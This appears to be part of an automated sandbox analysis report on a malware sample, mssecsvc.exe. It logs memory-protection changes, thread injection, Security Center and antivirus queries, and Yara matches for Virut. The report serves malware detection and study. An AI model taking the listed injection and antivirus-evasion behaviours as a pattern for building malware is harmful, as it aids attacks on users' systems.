              Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 773E99D0 protect: page execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 773EA120 protect: page execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 773E9670 protect: page execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 773E9A50 protect: page execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 773E9830 protect: page execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 773EA040 protect: page execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 773E99D0 protect: page execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 773EA120 protect: page execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 773E9670 protect: page execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 773E9A50 protect: page execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 773E9830 protect: page execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 773EA040 protect: page execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 773E99D0 protect: page execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 773EA120 protect: page execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 773E9670 protect: page execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 773E9A50 protect: page execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 773E9830 protect: page execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 773EA040 protect: page execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 773E99D0 protect: page execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 773EA120 protect: page execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 773E9670 protect: page execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 773E9A50 protect: page execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 773E9830 protect: page execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 773EA040 protect: page execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 773E99D0 protect: page execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 773EA120 protect: page execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 773E9670 protect: page execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 773E9A50 protect: page execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 773E9830 protect: page execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 773EA040 protect: page execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 773E99D0 protect: page execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 773EA120 protect: page execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 773E9670 protect: page execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 773E9A50 protect: page execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 773E9830 protect: page execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 773EA040 protect: page execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 773E99D0 protect: page execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 773EA120 protect: page execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 773E9670 protect: page execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 773E9A50 protect: page execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 773E9830 protect: page execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 773EA040 protect: page execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 773E99D0 protect: page execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 773EA120 protect: page execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 773E9670 protect: page execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 773E9A50 protect: page execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 773E9830 protect: page execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 773EA040 protect: page execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 773E99D0 protect: page execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 773EA120 protect: page execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 773E9670 protect: page execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 773E9A50 protect: page execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 773E9830 protect: page execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 773EA040 protect: page execute and read and writeJump to behavior
              Creates a thread in another existing process (thread injection)
              Source: C:\Windows\mssecsvc.exeThread created: unknown EIP: 7FFF3C38Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\FjYNZSPNkt.dll",#1Jump to behavior
              Source: dwm.exe, 0000001B.00000000.350379771.000002C633456000.00000004.00000001.00020000.00000000.sdmp, dwm.exe, 0000001B.00000002.837380196.000002C633456000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Program Manager
              Source: winlogon.exe, 00000007.00000002.805790920.000001AFDE0B0000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000007.00000000.282392035.000001AFDE0B0000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000007.00000000.272638752.000001AFDE0B0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
              Source: winlogon.exe, 00000007.00000002.805790920.000001AFDE0B0000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000007.00000000.282392035.000001AFDE0B0000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000007.00000000.272638752.000001AFDE0B0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
              Source: winlogon.exe, 00000007.00000002.805790920.000001AFDE0B0000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000007.00000000.282392035.000001AFDE0B0000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000007.00000000.272638752.000001AFDE0B0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager,
              Source: winlogon.exe, 00000007.00000002.805790920.000001AFDE0B0000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000007.00000000.282392035.000001AFDE0B0000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000007.00000000.272638752.000001AFDE0B0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
              Source: C:\Windows\System32\backgroundTaskHost.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\TargetedContentCache\v3\338389 VolumeInformationJump to behavior
              Source: C:\Windows\System32\backgroundTaskHost.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\TargetedContentCache\v3\338389\a55f2be5f0b941e987b5cade10ae9cb7_1 VolumeInformationJump to behavior
              Source: C:\Windows\System32\backgroundTaskHost.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\TargetedContentCache\v3\280815 VolumeInformationJump to behavior
              Source: C:\Windows\System32\backgroundTaskHost.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\TargetedContentCache\v3\280815\c174b4f911d842a39252a6b31960e6c8_1 VolumeInformationJump to behavior
              Source: C:\Windows\System32\backgroundTaskHost.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\TargetedContentCache\v3\314559 VolumeInformationJump to behavior
              Source: C:\Windows\System32\backgroundTaskHost.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\TargetedContentCache\v3\314559\b9de0c2b2b3648e8a125cac302df5505_1 VolumeInformationJump to behavior
              Source: C:\Windows\System32\backgroundTaskHost.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\310091\1658332418 VolumeInformationJump to behavior
              Source: C:\Windows\System32\backgroundTaskHost.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\338388\1658332418 VolumeInformationJump to behavior
              Source: C:\Windows\System32\backgroundTaskHost.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\338387\1658332419 VolumeInformationJump to behavior
              Source: C:\Windows\System32\backgroundTaskHost.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\338388\1658332423 VolumeInformationJump to behavior
              Source: C:\Windows\System32\backgroundTaskHost.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\StagedAssets\963e3f45523380a2c6863a4e725418b8c00a5272db711428aa77a85033610e1c VolumeInformationJump to behavior
              Source: C:\Windows\System32\backgroundTaskHost.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\StagedAssets\cf0e347e4829f32b660aa0a3b28c38bd7cba4cc57aa78e26c6d08bdb37dbb4a7 VolumeInformationJump to behavior
              Source: C:\Windows\System32\backgroundTaskHost.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\StagedAssets\632e00fad280a96729794f359a66b17a2dc39681bc37311dad989871bd234e0c VolumeInformationJump to behavior
              Source: C:\Windows\System32\backgroundTaskHost.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\StagedAssets\95d06b98be181b45e9ff457bef9e40c387a9c0bbc5b2f9c66c20cd5c2ec94d0c VolumeInformationJump to behavior
              Source: C:\Windows\System32\backgroundTaskHost.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\StagedAssets\2f08b9969a984767a36345d102e1c84e2fcfd54da755a2d98b6fe62b3330d53a VolumeInformationJump to behavior
              Source: C:\Windows\System32\backgroundTaskHost.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\StagedAssets\20a965134266d21288385fdc62819121648b69cc26f87e618a979d435d7547ac VolumeInformationJump to behavior
              Source: C:\Windows\System32\backgroundTaskHost.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\338387\1658332433 VolumeInformationJump to behavior
              Source: C:\Windows\System32\backgroundTaskHost.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\StagedAssets\6bce4edafa1d5562be892960e9a791e50699ffe57ea4fcf4b5b5456308a2e95f VolumeInformationJump to behavior
              Source: C:\Windows\System32\backgroundTaskHost.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\StagedAssets\842e4e4ad8e41e6a893a996baa08c061072d3b11c57f83bbc8f6b5992f9c5613 VolumeInformationJump to behavior
              Source: C:\Windows\System32\backgroundTaskHost.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\StagedAssets\963e3f45523380a2c6863a4e725418b8c00a5272db711428aa77a85033610e1c VolumeInformationJump to behavior
              Source: C:\Windows\System32\backgroundTaskHost.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\StagedAssets\cf0e347e4829f32b660aa0a3b28c38bd7cba4cc57aa78e26c6d08bdb37dbb4a7 VolumeInformationJump to behavior
              Source: C:\Windows\System32\backgroundTaskHost.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\StagedAssets\cbc20ba0195f823c2fea772005e771d5a040a705e7ba53a6725db96426511b39 VolumeInformationJump to behavior
              Source: C:\Windows\System32\backgroundTaskHost.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\StagedAssets\098847447c33ddf8f805abd62099314078d2782a710a881d2548ac395a48ce9f VolumeInformationJump to behavior
              Source: C:\Windows\System32\backgroundTaskHost.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\TargetedContentCache\v3\314559\83a4606a9c604ec59350c94231b7a4ff_1 VolumeInformationJump to behavior
              Source: C:\Windows\System32\backgroundTaskHost.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\TargetedContentCache\v3\338388 VolumeInformationJump to behavior
              Source: C:\Windows\System32\backgroundTaskHost.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\TargetedContentCache\v3\338388\2f9298d8ab8f4c23885c30ea9b373c83_1 VolumeInformationJump to behavior
              Source: C:\Windows\System32\backgroundTaskHost.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\TargetedContentCache\v3\338387 VolumeInformationJump to behavior
              Source: C:\Windows\System32\backgroundTaskHost.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\TargetedContentCache\v3\338387\361920c594c1482591c08f3c6c53d03d_1 VolumeInformationJump to behavior
              Source: C:\Windows\System32\backgroundTaskHost.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\TargetedContentCache\v3\338387\2b5e800dda5d4fe0804933c66ff1142b_1 VolumeInformationJump to behavior
              Source: C:\Windows\System32\backgroundTaskHost.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\TargetedContentCache\v3\338387\098c5115fc7f4ab9959905b886004365_1 VolumeInformationJump to behavior
              Source: C:\Windows\mssecsvc.exeCode function: 4_2_00B9388E GetSystemTime,Sleep,InternetGetConnectedState,gethostbyname,socket,ioctlsocket,connect,Sleep,closesocket,4_2_00B9388E
              Source: C:\Windows\mssecsvc.exeCode function: 4_2_00B9042D GetModuleHandleA,GetVersion,VirtualAlloc,FindCloseChangeNotification,SetProcessAffinityMask,NtCreateFile,NtOpenFile,NtCreateProcess,NtCreateProcessEx,NtCreateUserProcess,NtQueryInformationProcess,lstrcpyW,lstrcpyW,lstrcatW,NtMapViewOfSection,NtOpenProcessToken,CreateToolhelp32Snapshot,Process32First,Process32Next,OpenProcess,CreateRemoteThread,FindCloseChangeNotification,4_2_00B9042D

              Lowering of HIPS / PFW / Operating System Security Settings

              barindex
              Changes security center settings (notifications, updates, antivirus, firewall)
              Source: C:\Windows\System32\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cvalJump to behavior
              Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA &apos;AntiVirusProduct&apos; OR TargetInstance ISA &apos;FirewallProduct&apos; OR TargetInstance ISA &apos;AntiSpywareProduct&apos;
              Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : FirewallProduct
              Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiVirusProduct
              Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiSpywareProduct
              Source: svchost.exe, 00000016.00000002.792433509.000001FA92C40000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "@V%ProgramFiles%\Windows Defender\MsMpeng.exe
              Source: svchost.exe, 00000021.00000000.399456497.00000247D314C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000021.00000002.812507836.00000247D314C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: "@C:\Program Files\Windows Defender\MsMpEng.exe
              Source: svchost.exe, 00000021.00000002.817216854.00000247D368E000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000021.00000000.400929134.00000247D368E000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000021.00000000.401142709.00000247D36C5000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: (@\device\harddiskvolume4\program files\windows defender\msmpeng.exe
              Source: svchost.exe, 00000021.00000000.401142709.00000247D36C5000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000021.00000002.817775099.00000247D36C5000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: @\device\harddiskvolume4\program files\windows defender\msmpeng.exe
              Source: svchost.exe, 00000021.00000002.817216854.00000247D368E000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000021.00000000.400929134.00000247D368E000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000021.00000000.400308692.00000247D3613000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: *@\device\harddiskvolume4\program files\windows defender\msmpeng.exe
              Source: svchost.exe, 00000021.00000002.807269952.00000247D3000000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000021.00000000.397661101.00000247D3000000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: .@C:\Program Files\Windows Defender\MsMpEng.exe
              Source: svchost.exe, 00000021.00000000.399456497.00000247D314C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000021.00000002.812507836.00000247D314C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: *@C:\Program Files\Windows Defender\MsMpEng.exe
              Source: svchost.exe, 00000016.00000002.794012016.000001FA92D02000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
              Source: mssecsvc.exe, mssecsvc.exe, 0000000B.00000000.278856067.0000000000710000.00000080.00000001.01000000.00000004.sdmp, mssecsvc.exe, 0000000B.00000002.384640585.0000000000710000.00000080.00000001.01000000.00000004.sdmp, tasksche.exe, 0000001D.00000002.353692061.0000000000410000.00000002.00000001.01000000.00000008.sdmpBinary or memory string: 2\Device\HarddiskVolume2\Windows\ehome\mcupdate.exe
              Source: mssecsvc.exeBinary or memory string: 8\Device\HarddiskVolume2\Program Files\AVG\Av\avgcmgr.exe
              Source: svchost.exe, 00000021.00000002.807269952.00000247D3000000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000021.00000000.397661101.00000247D3000000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: $@C:\Program Files\Windows Defender\MsMpEng.exe

              Stealing of Sensitive Information

              barindex
              Yara detected Virut
              Source: Yara matchFile source: 11.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000018.00000000.314054124.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000F.00000002.784858800.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.784858660.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000002.388703492.0000000000A80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000D.00000002.785329108.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001F.00000000.384952230.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000025.00000000.427531330.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000021.00000000.392931300.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000D.00000002.784858398.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000D.00000000.283233215.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.665288410.0000000000A6B000.00000040.00000001.01000000.00000004.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000F.00000002.785379244.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000000.275433265.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000010.00000000.302543511.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000026.00000000.431362516.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000D.00000000.298581179.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000010.00000000.297399320.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000F.00000000.300859546.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000025.00000002.785172242.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001B.00000000.321636086.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001B.00000000.321813327.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001B.00000002.785061929.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001A.00000000.319687483.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001A.00000002.785023367.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000002.784858957.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000000.280733139.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000018.00000002.785329413.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001F.00000002.785042903.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.784832443.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000027.00000000.435545169.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001B.00000000.321645741.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000021.00000002.785141452.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000002.785409783.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000000.280760913.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000010.00000000.302520549.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000D.00000000.298527592.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001B.00000000.321842635.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000000.270789242.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.665390921.0000000000B90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000022.00000002.785106286.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000018.00000000.310448882.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000002.388561725.0000000000A6B000.00000040.00000001.01000000.00000004.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001A.00000000.319657354.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000010.00000002.785307990.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000000.296758568.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000026.00000002.785177108.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000F.00000000.290186231.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000020.00000000.389181031.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000018.00000002.784858725.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000022.00000000.407443351.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
